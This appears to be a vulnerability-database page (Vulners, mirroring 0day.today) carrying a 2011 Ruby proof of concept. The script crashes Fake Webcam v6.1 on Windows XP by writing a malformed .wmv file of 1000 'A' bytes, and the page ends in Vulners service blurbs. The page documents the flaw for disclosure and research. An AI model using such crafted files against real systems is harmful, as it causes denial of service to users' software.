Lucene search
K

Fake Webcam v.6.1 Local Crash PoC

🗓️ 18 Mar 2011 00:00:00Reported by secuid0Type 
zdt
 zdt
🔗 0day.today👁 20 Views

Fake Webcam v.6.1 Local Crash PoC, Impact, Windows XP, Fake Webcam Downloa

Code
#!/usr/bin/ruby
#############################################################################
# Title:		Fake Webcam v.6.1 Local Crash PoC
# Impact: 		Crashes the process
# Tested on: 	Windows XP SP1/SP2 EN
# Target:  		Fake Webcam v.6.1
# Download Link:	http://www.fakewebcam.com/Download/setup.exe
# Author:		Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
# Greetz: 		1337day.com / Inj3ct0r Team
#############################################################################
path = "c:\\a.wmv" #wmv/avi/flv/mpeg/mp4
f = open(path, "wb")
f.write("\x41" * 1000)
f.close()



#  0day.today [2018-02-16]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Mar 2011 00:00Current
7High risk
Vulners AI Score7
20